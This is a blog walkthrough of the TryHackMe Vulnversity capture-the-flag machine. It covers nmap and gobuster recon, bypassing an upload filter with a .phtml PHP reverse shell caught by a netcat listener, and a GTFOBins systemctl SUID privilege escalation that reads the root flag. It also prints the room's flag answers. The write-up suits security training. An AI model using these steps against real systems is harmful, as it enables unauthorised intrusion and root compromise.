root@blog:~#
CTF

Vulnversity Walkthrough

Vulnversity

The following are the answers and rough guide to the Vulnversity Machine on TryHackMe.

Task 1 - Deploy the machine

Deploy the machine

No Answer Needed

Task 2 - Reconnaissance

Gather information about this machine using a network scanning tool called nmap. Check out the Nmap room for more on this!

There are many nmap “cheatsheets” online that you can use too.

No Answer Needed

Scan the box, how many ports are open?

6

— My usual oneliner for nmap is: nmap -sV -sC -p- <IP> -o <box>.nmap. I like to output to a seperate file to keep things neat and easy to access.

What version of the squid proxy is running on the machine?

3.5.12

— Shown in the nmap results.

How many ports will nmap scan if the flag -p-400 was used?

400

— This is an interesting question because I made the mistake of changing the script to nmap -sV -sC -p-400 10.10.100.0 assuming the answer was 21, 22 and 139 the 3 total ports under 400, BUT, the question is asking how many ports will nmap scan.. the answer is in the question… it’s 400 🤦‍♂️

Using the nmap flag -n what will it not resolve?

DNS

— check the manual or man page in linux man nmap and this shows us that “-n/-R: Never do DNS resolution/Always resolve [default: sometimes])” so it is not resolving DNS.

What is the most likely operating system this machine is running?

Ubuntu

— nmap shows us a good guess at OS Discovery, in this case Ubuntu.

What port is the web server running on?

3333

— nmap displays this for us 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)) open HTTP on 3333

It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

No Answer Needed

Task 3 - Locating directories using GoBuster

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Now lets run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

No Answer Needed

What is the directory that has an upload form page?

/internal/

— Command to run is previously given gobuster dir -u http://10.10.100.0:3333 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -o vulnversity.gobuster - I elected to used seclists for this exercise and again an output file. Since gobuster displays everything in the terminal we can click the linked options to open in browser. Only one page has an upload section so /internal/ it is.

Task 4 - Compromise the webserver

Now you have found a form to upload files, we can leverage this to upload and execute our payload that will lead to compromising the web server.

Try upload a few file types to the server, what common extension seems to be blocked?

.php

— The guide recommends doing the BUrpsuite room firstly so you know how to use it to fuzz uploads. I threw together a small list of things to try and .php was the 3rd thing I could think of in that list, needless to say it was completequickly.

If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.

No Answer Needed

— Not a question, more a checkpoint to make sure you do the room first

Run this attack, what extension is allowed?

.phtml

— Process guides you through this and using Burp Intruder and Sniper.

Download the php shell you are provided, run netcat to monitor incoming requests nc -lvnp 1234 and then edit and upload the shell and navigate to that page: http://<ip>:3333/internal/uploads/php-reverse-shell.phtml

No Answer Needed

What is the name of the user who manages the webserver?

bill

— When netcat receives the request we are logged in as www-data and we are in the / directory, to find an user we need cd into /home which in this case belongs to bill (ls in the directory and it shows their folder).

What is the user flag?

8bd7992fbe8a6ad22a63361004cfcedb

— cd into bill directory and if you ls one more time we are presented with an user.txt handily as we are in Linux you can ‘cat’ the contents into termainal cat user.txrt and the result is displayed.

Task 5 - Privilege Escalation

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

On the system, search for all SUID files. What file stands out?

/bin/systemctl

— Using linux for a while you tend to pickup a few things, in this case I learned how to ‘find’ the things I am looking for, in this case we can use the ‘find’ command to look for interesting things find / -user root -perm -4000 -exec ls -ldb {} \; which shows us a number of potential binary files with SUID privileges in the output, the idea is to exploit one of these to run a script which leads us onto privilege escalation. Using GTFOBins we can check each of the entries one by one. Having searched there is systemctl which can be exploited using SUID Permissions.

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

— Using the GTFOBins page for systemctl we can modify the code and get it to cat out the content of /root/root.txt . Cheeky, but effective. The code for this is below:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/ha3ks"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

Now when I ran this I had an issue whre it would not output but after a box reset and ensuring I was in the /bin/ directory, it worked. I could run cat /tmp/ha3ks.


I don’t have any sponsors or anything but if you enjoy my work, or feel sympathy for my wife, then I have set up a Ko-Fi account as well as a BuyMeACoffee people can donate to.